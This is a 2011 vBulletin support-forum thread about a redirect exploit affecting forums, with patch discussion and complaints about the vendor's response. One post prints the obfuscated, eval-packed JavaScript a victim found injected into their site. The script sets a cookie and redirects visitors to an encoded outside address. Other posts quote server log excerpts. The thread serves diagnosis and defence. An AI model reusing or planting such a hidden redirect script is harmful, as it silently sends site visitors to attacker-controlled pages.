It looks like there has been a 4-1-3_Patch_Level_1 patch released since I last upgraded. Has anyone been hit after installing that one?
vBulletin 3.x and 4.x Redirect Security Exploit
Collapse
This topic is closed.
X
X
-
Originally posted by Marvindoes the 3.8.7 PL1 include the latest YUI, or it doesn't?
Originally posted by ZacheryRight now, i Don't believe it does
Originally posted by BrianThanks for the confirmation of a half-patch.
Patching on my own, again...Comment
-
Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
Change CKEditor Colors to Match Style (for 4.1.4 and above)
Steve Machol Photography
Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.
Comment
-
Comment
-
Btw, afaik, neither affected file exists in 3.x. The only way a 3.x forum would have had access to them is if they were using the remote hosted option, but yahoo patched them ages ago.Baby, I was born this wayComment
-
Comment
-
Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
Change CKEditor Colors to Match Style (for 4.1.4 and above)
Steve Machol Photography
Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.
Comment
-
One of our sites was hit by the redirect from google.
In Google results page I right-clicked on our link and chose 'save link', so I saved our page without visiting it. I opened the page in notebook and this is what I got:
<html><head></head><body><script type=
"text/javascript">var vbsp='CA433C43';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\ M\\N\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f\\r\\e\\n\\h\\i","\\G\\H\\ k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\ c\\C\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x2F|x6E|x73|x54|x64|x68|va r|x6C|x72|x61|_0x601cx5|_0x601cx3|_0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|fun ction|new|x76|x62|x31|x6B|Date|x78|x47|x4D|x53|x32|x3A|86400000|x77|x3F|vbsp|10'.split('|' ),0,{}))</script></body></html>
I can't find this code in my templates. Is it of any use defining where it comes from?Comment
-
I also noticed the following...
In the error logs it shows:
[Fri Jun 03 16:52:11 2011] [error] [client 77.245.91.19] PHP Warning: Call-time
pass-by-reference has been deprecated - argument passed by value; If you would
like to pass it by reference, modify the declaration of [runtime function
name](). If you would like to enable call-time pass-by-reference, you can set
allow_call_time_pass_reference to true in your INI file. However, future
versions may not support this any longer. in
/var/www/vhosts/nationaalautoforum.nl/httpdocs/includes/class_bbcode.php(172) :
eval()'d code on line 7, referer: http://www.nationaalautoforum.nl/mijn-auto/
many times. It started showing when the redirect stopped working.
Anybody?Comment
-
That's just a PHP warning but what's interesting is it implicates class_bbcode.php - the first time I've seen that specifically.Comment
-
The redirect is back and the errors have stopped! Why?
The last error was at 17:12:22
From access log:
77.245.91.19 - - [03/Jun/2011:17:12:16 +0200] "GET
/18905-fiat-presenteert-ruim-aangeklede-fiat-500-twinair.html HTTP/1.0" 200
10354 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
66.249.72.100 - -
[03/Jun/2011:17:12:16 +0200] "GET /volvo/ HTTP/1.1" 200 18828 "-" "Mozilla/5.0
(compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.245.91.19 -
- [03/Jun/2011:17:12:19 +0200] "GET /18939-vanafprijs-chevrolet-aveo.html
HTTP/1.0" 200 10246 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0
(compatible; Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - -
[03/Jun/2011:17:12:22 +0200] "GET /18973-audi-prijst-q3.html HTTP/1.0" 200 10258
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
93.125.201.157 - -
[03/Jun/2011:17:12:25 +0200] "POST /register.php?do=checkdate HTTP/1.1" 200 5513
"http://www.nationaalautoforum.nl/register.php" "Mozilla/4.0 (compatible; MSIE
8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET
CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
77.245.91.19 - - [03/Jun/2011:17:12:25 +0200] "GET
/18916-nissan-leaf-veiligste-ev-ooit-met-5-ncap-sterren.html HTTP/1.0" 200 10380
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - -
[03/Jun/2011:17:12:29 +0200] "GET
/18917-belastingvoordeel-zuinige-auto-s-verdwijnt.html HTTP/1.0" 200 11546
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
There is nothing strange to see...?Comment
-
http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working
And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.
Another instance which makes it beyond any doubt that my forums future lies with XenForo.Comment
-
I have;
http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working
And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.
Another instance which makes it beyond any doubt that my forums future lies with XenForo.Comment
-
I have;
http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working
And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.
Another instance which makes it beyond any doubt that my forums future lies with XenForo.Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
Change CKEditor Colors to Match Style (for 4.1.4 and above)
Steve Machol Photography
Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.
Comment
-
Sorry if that offended anyone, but this is nothing new.Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
Change CKEditor Colors to Match Style (for 4.1.4 and above)
Steve Machol Photography
Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.
Comment
Related Topics
Collapse
-
by CorbinHHi at vB,
I am planning to update our site Australian Photoholics Forum "ausph.com" to SSL.
Last time we tried this, we broke our site which was down for a week!
Everyone here...-
Channel: Support Issues & Questions
-
-
by fionixHi,
I was just wondering how you get the URL shorten in Vbulletin 5.1.7 ?
From what I can see you have it done here at vbulletin.com - see url below... there is this number (which...-
Channel: Support Issues & Questions
-
-
by zyuzGood afternoon.I set ssl whatever forum was on the https protocol, prescribed in your permanent address offline via https, but do not know how to do so, that would be a http version offline (http://f...
-
Channel: Support Issues & Questions
-
-
by rag_gupta
-
Channel: Support Issues & Questions
-
Comment